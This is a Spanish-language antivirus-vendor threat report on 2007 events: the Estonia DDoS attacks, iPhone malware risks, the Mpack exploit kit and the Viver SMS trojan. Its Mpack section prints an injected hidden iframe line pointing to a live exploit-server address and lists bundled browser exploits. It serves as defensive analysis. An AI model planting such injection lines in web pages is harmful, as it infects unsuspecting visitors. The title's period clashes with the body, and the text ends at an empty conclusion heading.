Segundo semestre de 2007 (Por Alexandr Góstiev).
Introducción
Es posible que este informe trimestral difiera en mucho de sus predecesores. Los sucesos ocurridos durante el primer semestre de 2007 indican que las amenazas continúan combinando diferentes tecnologías, desde la ingeniería social hasta la explotación de diversas fallas con el fin de vulnerar los sistemas.
La crisis en la creación de virus, a la que ya nos habíamos referido a fines del año pasado y que provocara cierta inquietud, puesto que nos aprestábamos a enfrentar una revolución, todavía continúa. Por el momento, notamos la ausencia de nuevas amenazas verdaderamente novedosas y la creciente comercialización de la creación de virus. Tal como lo habíamos señalado, desde ahora la pelota está en nuestra cancha. Por primera vez en muchos años, la iniciativa está en manos de los creadores de programas antivirus. Los elaboradores de virus, preocupados sólo por el lucro que puedan obtener de manera ilícita, se ven incapaces de generar nuevas ideas. Intentan explotar antiguas tecnologías que ya no constituyen problema alguno para los diseñadores de programas antivirus. Lo peor de todo es que la calidad ha cedido ante la cantidad. La masiva presencia de primitivos programas maliciosos que apuntan a cualquier blanco sigue en progreso, pero la situación evoca más bien una lucha entre robots que la resistencia ante el ingenio humano.
Este informe prácticamente no se refiere a los programas maliciosos, sino más bien enfoca el amplio campo de la seguridad informática, en los problemas relacionados con Internet, en las nuevas tecnologías y en las vulnerabilidades. Es en estas áreas que de ahora en adelante deben concentrarse los creadores de programas antivirus.
La caja de Pandora
No cabe la menor duda de que los sucesos de fines de abril y principios de mayo tendrán impacto en el año 2007. Por primera vez en la historia, los políticos, los militares y los expertos en informática del mundo entero han abordado un tema que hasta hoy era meramente virtual: la guerra cibernética.
Trataremos aquí el caso de Estonia, y en particular los ataques sufridos por decenas de servidores en este país. Todo comenzó a mediados de abril, cuando el gobierno de esta nación tomó la decisión de retirar un monumento en la ciudad de Tallin dedicado a la memoria de los soldados soviéticos muertos durante la liberación de Estonia durante la Segunda Guerra Mundial. Dicha decisión desencadenó una enérgica reacción de Rusia y comprometió seriamente las relaciones políticas entre ambos países.
A primera vista, este tipo de situaciones entre Rusia y las ex-repúblicas soviéticas, que hacen todo lo posible por deshacerse de su "pasado soviético", no son inusuales. Sin embargo, este incidente no habría alcanzado tales proporciones si no hubiera sido por varias circunstancias complementarias.
Desde el 27 de abril, los sitios Internet de la presidencia, del primer ministro, del parlamento, de la policía y de otros ministerios de Estonia fueron tomados por asalto por un gigantesco número de solicitudes provenientes de ordenadores distribuidos por todo el mundo. Esto se produjo inmediatamente después de que la policía de este país dispersara una marcha de protesta contra el retiro del monumento en Tallin. Se produjeron 600 arrestos y cerca de 100 personas resultaron heridas en enfrentamientos con la policía.
La respuesta se produjo directamente a través de Internet. Según un estudio elaborado por expertos de la compañía finlandesa F-Secure, los siguientes sitios fueron bloqueados a todo acceso a partir del 28 de abril :
www.peaminister.ee (oficina del Primer Ministro) : inaccessible
www.mkm.ee (Ministerio de Asuntos Económicos y de Comunicaciones) : inaccessible
www.sisemin.gov.ee (Ministerio del Interior) : inaccessible
www.vm.ee (Ministerio de Asuntos Extranjeros) : inaccessible
www.valitsus.ee (Gobierno) : inaccessible
www.riigikogu.ee (Parlemento) : inaccessible
El primer ataque se prolongó aproximadamente hasta el 4 de mayo. En este periodo, más de una decena de sitios Internet estonios fueron víctimas de ataques del tipo rechazo de servicio (DoS). Sin embargo, todo el mundo sabía que lo peor aún estaba por venir: la conmemoración del 9 de mayo, día del fin de la Segunda Guerra Mundial en Rusia se acercaba.
La sociedad Arbor, especializada en la protección contra ataques DoS, publicó estadísticas sobre los sucesos acaecidos en Estonia. Resulta interesante que este informe presenta datos a partir del 3 de mayo. Tal vez en ese momento las autoridades estonias se contactaron con Arbor en busca de ayuda, porque no existe ningún dato sobre la primera ola de ataques (del 27 de abril al 3 de mayo). Detengámonos un instante en los datos que están a nuestra disposición. <http://asert.arbornetworks.com/2007/05/estonian-ddos-attacks-a-summary-to-date/> :
Ataques Fecha
21 2007-05-03
17 2007-05-04
31 2007-05-08
58 2007-05-09
1 2007-05-11
Resulta evidente que la segunda ola de ataques comenzó el 8 de mayo y alcanzó su pico el 9 del mismo mes. Conviene precisar qué es lo que entendemos aquí por "ataque". Arbor señala que durante dos semanas se registraron 128 ataques DoS, de los cuales 115 utilizaron el método ICMP-flood, 4 el método SYN tradicional, mientras que los 9 restantes eran variaciones al tema del incremento de tráfico.
Se trata sólo de una porción de todos los ataques realizados, pero eso es suficiente para tener una idea del alcance de los sucesos. Se remarca igualmente que la mayoría de los ataques fueron muy breves (no más de una hora). Sólo 7 ataques se extendieron por más de 10 horas.
El ataque contra Estonia se desplegó en distintos frentes. Además de los ataques DoS lanzados contra los principales sitios Internet gubernamentales, hubo también una deformación masiva de decenas de otros sitios estonios. Las principales víctimas fueron los sitios operando bajo diferentes rutinas con varias fallas, desde las vulnerabilidades del tipo CSS/XSS hasta la inyección SQL.
Las deformaciones de los sitios no representaban ninguna dificultad en particular y pudieron haber sido realizadas en cualquier momento, pero estos hechos llamaron la atención de piratas informáticos de todo el mundo y muchos de ellos aprovecharon la situación y la utilizaron como un campo de maniobras para demostrar y aplicar sus conocimientos.
El sitio Internet del Partido Reformador, presidido por el Primer Ministro Andrus Ansip, fue uno de los primeros en ser deformados. La página de inicio fue reemplazada por un texto con disculpas dirigidas a la población rusa de Estonia. "¡El Primer Ministro pide disculpas!". "El primer Ministro y el Parlamento estonios ofrecen sus disculpas a toda la población rusa de Estonia y se comprometen a reponer el monumento de bronce en su lugar original", eran algunas de las frases del texto publicado por los piratas cibernéticos.
Los sitios Internet en Rusia también fueron víctimas de estos ataques. "Este 3 de mayo, el sitio de la Presidencia de la Federación Rusa fue víctima de una ataque sin precedentes desde ordenadores aparentemente localizados en los países bálticos", anunciaba la agencia RIA Novosti en el Kremlin. Sin embargo, gracias a un sistema de redundancia instalado en el sitio de la presidencia y gracias también a la aplicación de modernos sistemas de seguridad, en ningún momento se llegó a perder el control del sitio. Sin embargo, una fuente del Kremlin admitió que "hubo ciertos problemas" y que "lamentamos que los ataques de piratas informáticos contra los servidores de organismos gubernamentales en varios países sean una práctica tan extendida".
Los sitios Internet de medios de comunicación rusos, como por ejemplo, el de la radio El eco de Moscú o el del periódico Kommersant, fueron también blanco de estos ataques. En ciertos casos, las víctimas no entrevieron la relación entre los sucesos en Estonia y los ataques de los que fueron víctimas.
Es probable que los piratas cibernéticos estonios hubieran participado en la deformación de los sitios de sus rivales directos en el territorio ruso; es así que los sitios Internet de los defensores del monumento al soldado liberador fueron deformados el 9 de mayo. Toda la información de la página de inicio de la organización Notchnoy Dozor (web-dozor.ru) fue eliminada y reemplazada por carteles con el texto "Orgulloso de ser estonio", la bandera estonia y la consigna "¡Estonia por siempre!". Además, por lo menos otro sitio, 1-net.ru, fue igualmente blanco de estos ataques pirata.
Se trataba de un intercambio directo de golpes virtuales como lo ilustran de manera muy clara las siguientes capturas de pantalla:
¿Cuál fue la reacción de las autoridades estonias? En primer lugar, la policía criminalística central de Estonia arrestó a un joven habitante de Tallin, llamado Dmitra, con estudios técnicos superiores, por los ataques contra los sitios Internet gubernamentales de este país. Los siguientes sucesos fueron del todo inesperados. Los políticos estonios osaron acusar a los servicios secretos rusos. Por primera vez, se utilizó el término "guerra cibernética" en tonos elevados.
Todo el mundo sabe que los servicios secretos poseen un departamento encargado de la protección de los recursos electrónicos nacionales rusos y de emprender diversas acciones, es decir, estamos hablando de "espionaje electrónico". Así, el ejército americano dispone de una unidad similar y sus miembros participan en competencias contra piratas informáticos, pero sin mucho éxito.
Dicho esto, nunca antes ningún estado había acusado a otro de haber lanzado un ataque cibernético, ni siquiera en el caso del conflicto indo-paquistaní a fines de los 90 cuando piratas informáticos de ambos países libraron un amargo combate en Internet, que dio lugar, entre otras cosas, a la creación del gusano Lentin (Yaha), uno de los gusanos de correo más devastadores del último decenio.
Tampoco se dio nada parecido durante la intervención de la OTAN en el conflicto yugoslavo y en el bombardeo de Serbia, cuando los ciberpiratas serbios, ayudados por piratas de otros países, atacaron sitios Internet americanos y de la OTAN.
Ni siquiera se observó una reacción semejante durante los varios periodos de tensión entre China y Japón cuando los sitios Internet gubernamentales japoneses fueron víctimas de ataques del tipo DoS.
Ni tampoco cuando los sitios Internet de ministerios y de agencias americanas sufrieron ataques (bueno, siempre están bajo ataques) de grupos de piratas cibernéticos chinos que lograron obtener acceso a información clasificada.
En el caso que nos concierne, parecía que alguien en particular tenía interés en llevar el conflicto a niveles extremos, tal como se evidencia en la dirección seguida por los atacantes de los sitios estonios.
Primeramente, el Ministro de Asuntos Extranjeros de Estonia, Urmas Paet, declaró que los piratas actuaban desde Rusia y con claro apoyo de los ordenadores de organizaciones gubernamentales. Luego, el Ministro de Defensa de Estonia, Yaak Aaviksoo, planteó la pronta resolución de la cuestión de los ataques cibernéticos en tanto se los reconozca como actos de guerra. "En este momento, la OTAN no considera los ataques cibernéticos como actos de guerra. En consecuencia, los países miembros de la OTAN víctimas de tales ataques se encuentran imposibilitados de invocar el artículo 5 del tratado de protección militar. Ninguno de los ministerios de defensa de los países miembros de la OTAN reconocen hoy en día tales ataques como actos de guerra. Nosotros necesitamos resolver este asunto rápidamente", declaraba el ministro estonio.
En realidad, Estonia deseaba una defensa militar contra las amenazas por Internet. Esta constituía una grave declaración. Antes de realizar tales declaraciones, es necesario contar con al menos pruebas irrefutables sobre la participación de estructuras estatales rusas en los mencionados ataques. Una vez concluidos estos, Estonia nunca presentó pruebas concretas al respecto. Expertos de la OTAN enviados a Tallin en mayo para apoyar al país aliado, tampoco pudieron confirmar la hipótesis estonia. De hecho, todas las declaraciones sobre el rol del gobierno ruso se basaban en una sola demanda dirigida al sitio Internet del Presidente de Estonia, cuya dirección IP "pertenecía a un empleado de la administración presidencial rusa".
Fue así que se desterró el término "guerra cibernética". Tropas de expertos provenientes de los Estados Unidos, de Europa y de Israel desembarcaron en Estonia. Algunos llegaron para ayudar a las autoridades estonianas a reaccionar ante la amenaza, y otros, para ganar invalorable experiencia, estudiar la defensa y aprender lecciones a aplicar en la protección de sus propios sistemas nacionales.
¿Qué sucedió en el sector ruso de Internet durante este periodo? Las acusaciones lanzadas por los estonios contra las autoridades rusas no dejaron mucho espacio a la opinión de los internautas rusos sobre el retiro del monumento. La opinión, en su mayoría, era hostil contra los estonios. Y desde que comenzaron los enfrentamientos con la policía, un gran número de internautas rusos que no contaban con los medios para expresar en persona su oposición, decidieron utilizar el único método a su alcance, es decir, una protesta a través de Internet: participarían en ataques DoS.
Resulta imposible saber con precisión cuándo o dónde apareció la idea de arremeter contra el tráfico de la red. Es posible que surgiera entre los grupos de piratas informáticos que ya habían adoptado una estrategia similar en el pasado contra los sitios Internet de combatientes chechenos. Se aprovechó esa experiencia y se la volvió a implementar. Varios foros y sitios comenzaron a proponer una variedad de programas que enviarían un número infinito de demandas hacia los sitios estonios. No importa quién pudo descargar este tipo de programas e instalarlos en su ordenador. Desde un punto de vista tecnológico, se trata de una red zombi. La única diferencia es el carácter voluntario de la red, creada de común acuerdo entre usuarios que sabían lo que hacían. Vale la pena dar una nueva mirada a las estadísticas sobre los ataques recogidas por los especialistas de Arbor: ¡la mayoría de los ataques duró menos de una hora! ¿De dónde sale la idea de que los servicios secretos rusos hubieran "prestado" a los piratas tiempo para utilizar sus redes zombi?
Por supuesto, una parte de los ataques fue realizada desde "auténticas" redes zombi, compuestas de ordenadores previamente infectados, pero no hay que subestimar el poder del ataque "manual".
Nos encontramos más próximos a la guerrilla, que a la guerra cibernética.
Además, ningún diseñador de programas antivirus del mundo, ha descubierto programas maliciosos específicos que hubieran sido creados para atacar los sitios estonios.
Hoy por hoy, los ataques contra Estonia han cesado. Los expertos han vuelto a sus países de origen, los fabricantes de equipos de redes se han beneficiado de un gran número de nuevos contratos, los periodistas han escrito decenas de artículos sobre este tema, el monumento ha sido trasladado a otro emplazamiento y los restos de los soldados soviéticos han encontrado otro lugar de reposo. Dmitria, el joven de 19 de Tallin, arrestado bajo sospecha de haber organizado los ataques, ha sido liberado por insuficiencia de pruebas en su contra.
"No creo que Rusia estuviera detrás de todo eso, pero ¿cómo probarlo?" declaró Gadi Evron, especialista israelí en seguridad informática. Gadi Evron estuvo cutaro días en Tallin a pedido de los estonios realizando una investigación en el sistema. Internet es el medio ideal ara oponerse legítimamente a lo que uno quiera.
" Cuando las tensiones políticas se hacen evidentes, se desbordan automáticamente en las redes virtuales", explica Gadi Evron, citando como ejemplo los ataques contra sitios daneses luego de que un periódico danés publicara caricaturas del profeta Mohammed.
A partir de ahora, la comunidad informática internacional juega con los términos "guerra cibernética" y "terrorismo cibernético", y apunta a Rusia como "el primer país del mundo en haber lanzado la bomba digital". Especialistas del mundo entero elaboran escenarios de verdaderas guerras informáticas:
Michael Tammet, responsable de comunicaciones y tecnologías informáticas del Ministerio de Defensa de Estonia, señala que "es una arma con efecto cascada. Primero, una difusión desde una red zombi, ya señalada por el FBI, complicará el acceso a los portales de información más populares. Luego, Las casillas de correo electrónico serán dañadas y los piratas cibernéticos se valdrán de esta cobertura para introducirse en los servidores de organizaciones gubernamentales de comunicaciones, de transporte, y de finanzas, lo que provocará una desestabilización de los sistemas en su conjunto".
Mientras que los motores de búsqueda y los gobiernos del mundo intentan limitar de muchas maneras el acceso a información circulando en Internet sobre la fabricación de bombas, los asuntos relacionados con el terrorismo cibernético no son tratados como se debería dada la realidad actual. Kaspersky Anti-Virus siempre ha sostenido que la publicación de artículos y los debates realizados sobre los métodos que permiten anular objetos vitales no es una práctica aceptable. No cabe la menor duda de que este tipo de información pueden llevar a diferentes grupos extremistas a experimentar en tales escenarios.
La caja de Pandora ya se abrió. Pero, ¿a quién beneficia?
iPhone
El suceso más importante del segundo trimestre de 2007 en el sector de los dispositivos móviles, y probablemente de todo el año, fue el lanzamiento al mercado del iPhone, el teléfono portátil de Apple.
Millones de consumidores americanos esperaban impacientes el lanzamiento al mercado de este producto y algunos no dudaron en acampar frente a las tiendas durante varios días antes del día D. Por su parte, expertos en seguridad industrial han tratado de analizar el efecto del iPhone sobre el nivel de seguridad global de los dispositivos móviles y se han preguntado si la evidente popularidad de la que goza este teléfono terminaría con el adormecimiento hasta ahora observado en todo el mundo de los virus elaborados para este tipo de dispositivos.
Kaspersky Lab tiene gran interés en la problemática de las amenazas dirigidas a los dispositivos móviles. En efecto, fuimos nosotros quienes descubrimos hace tres años los primeros virus para dispositivos móviles.
A fin de evaluar la probabilidad del surgimiento de programas maliciosos para diversos aparatos y sistemas operativos, hemos adoptado, desde hace mucho tiempo, una metodología que se basa en tres factores:
1. La popularidad y la difusión del sistema operativo.
2. La existencia de una documentación diversa y completa sobre el sistema.
3. La vulnerabilidad del sistema o la existencia de fallas conocidas en su seguridad y en sus aplicaciones.
Cada una de estas condiciones es obligatoria y si todas se cumplen de manera simultánea, es muy posible la aparición de programas maliciosos.
Enfoquemos estos factores en el iPhone.
Popularidad
En tres días se vendieron 500.000 unidades del iPhone de Apple. El blog engadgetmobile.com que se vincula con waitingforiphone.com señala que durante los diez primeros días del mes de julio, sólo en los Estados Unidos se vendieron más de un millón de teléfonos portátiles Apple iPhone. Según los analistas, esta cifra alcanzará los 13.5 millones dentro de un año y medio.
¿Son importantes estas cifras para sacar conclusiones sobre su popularidad?
En 2003, en el mundo entero se vendieron 6.7 millones de teléfonos portátiles con sistema Symbian y sólo en diciembre de 2003 se vendieron más de un millón de unidades.
En 2004, año en el que Cabir, el primer gusano para dispositivos móviles hizo su aparición, ya había cerca de 15 millones de teléfonos inteligentes con sistema Symbian en todo el mundo, y cerca del 70 por ciento de ellos eran de la marca Nokia. En aquel año, la participación de Symbian en el mercado de los teléfonos inteligentes llegaba al 38 por ciento.
Durante el segundo trimestre de 2005, se vendieron 7.8 millones de teléfonos con plataforma Symbian, contra 2.4 millones vendidos en el segundo trimestre de 2004. En el primer semestre de 2005 se vendieron 14.5 millones de dispositivos móviles con plataforma Symbian.
Resulta evidente que los 13.5 millones de unidades de iPhone que se prevé vender desde ahora hasta fines de 2008, pueden compararse con los 15 millones de dispositivos con sistema Symbian del año 2004. Basados en esta información, podemos entonces deducir que en 2008 los virus elaborados para el iPhone serán una realidad. Además, es muy probable que eso se produzca aún antes del fin de año, dado el interés de los consumidores de este aparato y la campaña publicitaria que lo impulsa.
En realidad, el iPhone ya es popular, aunque que las cifras de ventas absolutas aún no han sido divulgadas. Según resultados de una extensa encuesta analítica realizada por Lightspeed Research durante la semana siguiente al anuncio oficial de iPhone (29 de junio), uno de cada tres americanos deseaban adquirir este nuevo producto. 8 por ciento de los encuestados tenían la intención de comprar este teléfono en el curso de los siguientes tres meses, mientras que el 22 por ciento pretendían hacerlo "en un momento dado en el futuro".
Aún faltan dos factores.
Documentación
Apple anunció que el iPhone utilizará una versión especial del sistema operativo Mac OS X. Todavía no se ha emitido ningún comunicado oficial sobre las diferencias entre la versión de Mac OS X para dispositivos móviles y la versión para ordenadores, pero es muy probable que estas diferencias sean mínimas. Se trata de una versión habitual optimizada sin tomar en cuenta los diversos periféricos informáticos y las aplicaciones superfluas. La versión interna del sistema operativo se denomina "OS X 1.0 (1A543a)".
El procesador del iPhone utiliza la arquitectura ARM y por lo tanto, es posible utilizar aplicaciones desarrolladas para el ensamblador ARM, sobre el cual se cuenta con bastante documentación.
Estos dos elementos demuestran con certeza que nada impide la realización de la condición "documentación".
Queda entonces un factor, que quizás sea el más importante:
La vulnerabilidad y la existencia de fallos.
En su conjunto, Apple, y más exactamente su sistema operativo y sus aplicaciones, no ha tenido mucho éxito respecto a las vulnerabilidades. Las vulnerabilidades existen, son numerosas y críticas, y la mayoría de ellas fueron descubiertas porque el sistema operativo Mac en estos últimos tiempos ha logrado conquistar a nuevos usuarios, porque su popularidad aumenta, y porque más y más piratas informáticos se dedican a "explorar sus entrañas". Ya hemos mencionado los gusanos de red dirigidos a Mac OS X que explotan vulnerabilidades con el fin de propagarse. Nada indica que el sistema operativo del iPhone no se enfrente con los mismos problemas.
Ya a principios del mes de junio, los expertos de la sociedad SPI Dynamics anunciaban el descubrimiento de la primera vulnerabilidad en el iPhone. Dicha vulnerabilidad está relacionada con el sistema de composición de números con la ayuda de una solución especial automática integrada en el navegador Safari. Bajo ciertas condiciones, un delincuente cibernético puede redirigir la demanda del usuario del iPhone hacia otro número de teléfono, realizar un llamado a costa del usuario, impedir que las llamadas concluyan, o lanzar un ciclo sin fin de composición de números que se detenga sólo con el reinicio del aparato.
El sitio Internet de SPI Dynamics indica que en teoría existen varias formas de lanzar un ataque. Los delincuente cibernéticos pueden intentar atraer a la víctima hacia un sitio Internet malicioso. Además, también es posible lanzar un ataque a través de un recurso legítimo en línea sujeto a ataques CSS (Cross-Site Scripting).
Bill Hoffman, analista de SPI, explica : " En la medida en que este plan pueda ser implementado en cualquier sitio, y que cualquier usuario de iPhone pueda ser víctima, esta vulnerabilidad debe ser considerada como grave".
Dicho esto, el iPhone posee algunas características que podrían complicar la tarea de los elaboradores de virus. Primeramente, ¡Bluetooth puede usarse sólo para conectar accesorios! Bluetooth no puede emplearse para la transmisión de datos o para sincronizar el teléfono con un ordenador. Bajo estas condiciones, la posibilidad de ver aparecer gusanos dirigidos al iPhone parecidos a Cabir para el sistema Symbian, parece poco probable. La imposibilidad de transferir archivos a través de Bluetooth priva a los gusanos de lo que constituye su modo favorito de propagación.
¡La segunda restricción similar es la ausencia de MMS! Esta particularidad, que ha provocado numerosas críticas de parte de los usuarios, atañe a los virus que funcionan sólo en condiciones parecidas a las descritas para Bluetooth. Sin MMS, los gusanos se ven privados de su segundo modo favorito de propagación. Entonces, resulta improbable que el gusano conocido como ComWar para la plataforma Symbian llegue a adaptarse para el iPhone.
Las anteriores constituyen serias restricciones. Sin embargo, el hecho más notable es que no fueron impuestas de manera deliberada por Apple como resultado de una evaluación de los problemas que podrían provocar los gusanos para dispositivos móviles y la consecuente toma de decisiones para mejorar la seguridad del aparato.
En base a todo lo dicho, estamos en condiciones de afirmar que los programas maliciosos para iPhone harán su aparición el próximo año y que no se tratará de gusanos. Resulta más probable que surjan virus de archivos tradicionales y diversos tipos de troyanos. Pero la principal amenaza para los usuarios del iPhone serán las diversas vulnerabilidades que pueden ser aprovechadas por delincuente cibernéticos para acceder a datos almacenados en este teléfono.
Mpack
A mediados de junio, las revistas especializadas en asuntos de seguridad informática publicaron informaciones preocupantes surgidas en Italia. Algunos miles de sitios italianos fueron el origen de la propagación de programas maliciosos. En el transcurso de algunos días se descubrieron más de 6.000 servidores cuyas páginas contenían algunas líneas de código HTML que no habían sido introducidas por sus propietarios. Dichas líneas se parecían a esta (existen diferentes variantes en las cuales el tamaño de la ventana iframe (ancho/altura) es cero, uno y así sucesivamente): <iframe src='adresse' width=5 height=5></iframe>
Los expertos de Kaspersky Lab ya conocían estas líneas desde hacía algunos años: se trata de una construcción típica para la utilización de varios códigos de explotación de vulnerabilidades en navegadores. El sitio indicado en el campo 'adresse' puede ser una dirección que reenvía a los visitantes a sitios que contienen el código de explotación, o puede ser la misma fuente de infección.
La etiqueta <iframe> se convirtió después de mucho tiempo en uno de los favoritos en este caso, pues abre una nueva ventana del navegador y cuando las dimensiones son iguales a cero, la ventana se torna invisible para el usuario. Como resultado, la activación del código de explotación pasa desapercibida para el usuario, quien ni siquiera sabe que en ese mismo instante se encuentra en otro sitio, además del mostrado en la ventana principal.
A continuación damos algunos ejemplos de casos recientes:
En septiembre de 2006, los expertos de Kaspersky Lab recibieron mensajes sobre el extraño comportamiento de navegadores de Internet al abrir el sitio top.rbc.ru. Internet Explorer y todos sus módulos externos se detenían debido a un error; Firefox continuaba funcionando, pero utilizando 400 MB de RAM.
Al analizar las páginas, los expertos de Kaspersky Lab descubrieron en el código un vínculo que conducía a un sitio registrado bajo el dominio pp.se. Dicho vínculo contenía una rutina con el código de explotación de la vulnerabiliad descrita en Microsoft Security Advisory (926043).
El código de explotación descargaba en el ordenador atacado una nueva versión del troyano Trojan-PSW.Win32.LdPinch, ayj.
En diciembre de 2006, los expertos de Kaspersky Lab detectaron al menos 470 servidores infectados con el troyano Trojan-Downloader.JS.Psyme. Todos estos servidores utilizaban los servicios de alojamiento Valuehost. Uno de los recursos infectados fue el famoso portal www.5757.ru
Al visitar el sitio infectado, una rutina integrada a la página por los delincuente cibernéticos activaba la descarga del troyano Trojan-Downloader.JS.Psyme, el cual, a su vez, cdescargaba otros programas maliciosos en el sistema atacado.
Nosotros ya teníamos cierta experiencia en la lucha contra este tipo de códigos de explotación.
Algunos días antes de la aparición de los problemas en Italia, habíamos constatado un incidente similar en Rusia, en el popular sitio RBC.ru.
El 7 de junio de 2007, un gran número de usuarios que visitaron el sitio rbc.ru vieron los mensajes de alerta del programa antivirus indicando un intento de infección de parte de un troyano.
Un detallado análisis permite ver que la página de inicio contenía el código
<iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0></iframe>
Lo que nos sorprendió fue el hecho que Mpack traspasara las fronteras de Rusia y fuera utilizado en Italia. Esta es la razón:
" Mpack fue creado en Rusia por piratas rusos, que luego lo vendieron a piratas italianos.
" Sus creadores son los mismos que participaron activamente en la creación y al sostenimiento de otro troyano muy extendido: LdPinch.
" Circulan en el mercado negro algunos otros códigos de explotación con similares funciones: Q406 Roll-up package, MDAC, WebAttacker, etc. Todos ellos tienen un nivel de "penetración" superior al de Mpack.
Examinemos detenidamente lo que sucede y la manera en que sucede.
Existe una selección de códigos de explotación desarrollados en PHP (o bien en cualquier otro lenguaje de rutinas como VBS o JS).
Esta selección retoma ciertos códigos de explotación que utilizan vulnerabilidades en los navegadores y en los sistemas operativos más conocidos. La selección más elemental puede ser retomada en la siguiente lista aproximada:
- MS06-014 para Internet Explorer 6
- MS06-006 para Firefox 1.5
- MS06-006 para Opera 7
- WMF Overflow
- QuickTime Overflow
- WinZip Overflow
- VML Overflow
Por lo general, los códigos de explotación se cifran para evitar ser descubiertos por programas antivirus en Internet, lo que complica su identificación y su análisis.
El delincuente cibernético coloca la selección de códigos de explotación en su propio sitio. Su principal tarea consiste ahora en atraer víctimas. Para resolver este problema, se vale de otros sitios. El pirata logra, de una manera u otra, acceder a otros sitios. Generalmente utiliza cuentas de acceso previamente robadas por un troyano cualquiera, como por ejemplo, LdPinch.
Acto seguido, añade a todas las páginas de este sitio la etiqueta <iframe> que conducirá al internauta hasta el sitio infectado. Para añadir la etiqueta <iframe> en forma masiva, puede servirse de varios utilitarios, como FTPTollz, creado por un escolar ruso.
Todo está listo. Decenas de miles de internautas visitan sus sitios favoritos sin darse cuenta que han sido comprometidos y que los navegadores son atacados por diversos códigos de explotación.
Pero la ejecución del código de explotación no constituye un fin en sí mismo que sea perseguido por los piratas informáticos. Su objetivo es instalar programas maliciosos en el sistema atacado. En general, se instala un programa del tipo Trojan-Downloader, que permite descargas futuras de cualquier tipo de elementos, desde virus hasta programas espía o puertas traseras.
Todas estas selecciones de códigos de explotación poseen módulos de estadísticas que mantienen informado al delincuente cibernético sobre el número de usuarios infectados, el país donde se encuentran, los navegadores empleados, y el sitio a través del cual cayeron las víctimas.
Los autores de Mpack vendieron este programa en 1.000 dólares, existiendo la posibilidad de comprar un soporte complementario (adición de nuevos códigos de explotación a la selección). Este escenario es completamente idéntico al que caracteriza las ventas de otras populares selecciones de los códigos de explotación arriba mencionados.
El rendimiento de estas selecciones de códigos de explotación se mide por la tasa de usuarios infectados que visitan el sitio infectado. Aunque los autores prometen una tasa de 30 a 50 por ciento, en la práctica rara vez este índice sobrepasa el 10 ó 12 por ciento. Esta cifra no deja de ser preocupante si se tiene en cuenta de que el número de usuarios afectados se cuenta por miles.
Desde nuestro punto de vista, el principal problema es que los autores de Mpack no pueden ser acusados ante la ley como responsables. Oficialmente, realizan un trabajo no declarado y no pagan impuestos sobre las ventas. Por otra parte, no comprometen los sitios a fin de introducir un vínculo con <iframe>, ya que esta acción la realiza la persona que adquiere Mpack. Los autores se contentan con tomar códigos de explotación descubiertos por otras personas, desde fuentes abiertas como lo son los centenares de sitios dedicados a la seguridad de datos. Todo lo que hacen es juntar estos códigos de explotación en una selección y no son responsables del uso que se les pueda dar.
Tómese como ejemplo Metasploit Framework, un proyecto popular y reconocido en el mundo de la seguridad informática. No existe ninguna diferencia entre los que hacen los autores de Mpack y los de HD.Moore (creador de Metasploit). Uno claramente afirma para qué sirven estas selecciones, mientras que los otros los presentan como un instrumento indispensable para el administrador que desee probar sus propios sistemas.
Aquí nos vemos confrontados a un antiguo problema aún sin resolver: la publicación de las vulnerabilidades ¿constituye un acto útil o perjudicial? No deseamos polemizar con los partidarios de una u otra opinión. Por el momento, nos limitamos a presentar los hechos, pero luego volveremos a tratar este problema y plantearemos nuestra posición sobre todo lo que actualmente sucede, bajo los conceptos del "sombrero blanco" y el "sombrero negro".
Viver
A mediados de mayo descubrimos tres versiones de un nuevo troyano para teléfonos portátiles, Trojan-SMS.SymbOS.Viver que envía SMS de pago a cierto número con una tarifa elevada, para luego debitar cierta suma de dinero de la cuenta del propietario del teléfono y transferirla al pirata informático.
Este tipo de troyano no es nuevo: el año pasado descubrimos las primeras muestras capaces de funcionar en casi cualquier teléfono portátil compatible con Java, como RedBrowser y Webster. Viver se distingue de estos por el hecho de que ha sido especialmente concebido para los teléfonos con plataforma Symbian y porque se trata del primer troyano SMS para teléfonos inteligentes.
Tras analizar estas muestras, logramos definir la manera en que se propaga este código malicioso así como el sistema implementado por los delincuente cibernéticos para recibir el dinero.
Los troyanos se colocan en la sección Intercambio de Archivos de dimonvideo.ru, un sitio ruso apreciado por los usuarios de teléfonos inteligentes. Cualquier usuario registrado en este sitio puede añadir archivos a esta sección.
Como es frecuente, los troyanos aparecen como utilitarios, por ejemplo, editores de fotografías, una selección de codecs video, etc. Una vez instalados en el teléfono inteligente, el troyano envía mensajes SMS al número 1055. El costo de envío de un mensaje SMS es de 177 rublos (7 dólares americanos).
El número 1055 resulta ser muy interesante. Como pudimos constatar, no es la primera vez que este número es utilizado por piratas rusos, permitiéndoles mantener el anonimato.
¿De qué manera?
Sabemos que los operadores de telefonía móvil alquilan números cortos. Sin embargo, el costo de tal servicio resulta ser muy caro para un usuario particular. Ahora bien, existen proveedores de contenido que alquilan tales números para luego subalquilarlos tras añadirles un determinado prefijo.
El número 1055 es alquilado por uno de estos proveedores de contenido. Si este número está subalquilado y se envía un mensaje, por ejemplo que comience con "S1", entonces el sistema del proveedor transfiere una parte del costo de este mensaje MSM a la cuenta del subarrendatario "S1". El operador de telefonía móvil se queda con una parte, entre el 45 y el 49 por ciento del costo del mensaje SMS, mientras que aproximadamente el 10 por ciento está destinado al proveedor de contenido. El resto es enviado al subarrendatario, en este caso, un ladrón "móvil".
Sabemos a ciencia cierta que cerca de 200 personas descargaron una de las versiones de Viver en 24 horas. Después, el administrador del sitio eliminó el troyano. Un simple cálculo muestra que con 200 víctimas, y con un mensaje MSM de 117 rublos, el pirata obtuvo en un día un "salario" de 14.000 rublos (más de 500 dólares americanos).
Este incidente muestra una vez más que las modernas tecnologías implementadas en dispositivos móviles no cesan de llamar la atención de los delincuente cibernéticos. En este caso, el fraude ocurre en el uso de un número corto propuesto por varios operadores de telefonía móvil o por proveedores de contenido. Lamentablemente, la posibilidad de retirar dinero de la cuenta de un abonado, sin su consentimiento, y sin información complementaria constituye una de las debilidades de los actuales servicios de telefonía móvil. Este hecho daña la imagen de los operadores de telefonía móvil, la de los proveedores de contenido y la de los servicios en general.
En el mes de mayo registramos tres nuevos incidentes. ¿Cuál es el nombre exacto de los troyanos de este tipo? Sólo podemos adivinarlo. Lamentablemente, no disponemos de estadísticas similares de los países extranjeros, y los diseñadores extranjeros de programas antivirus no reportan ningún caso de este género. Entonces, difícilmente podemos creer que este problema afecte sóloa a Rusia.
Conclusión
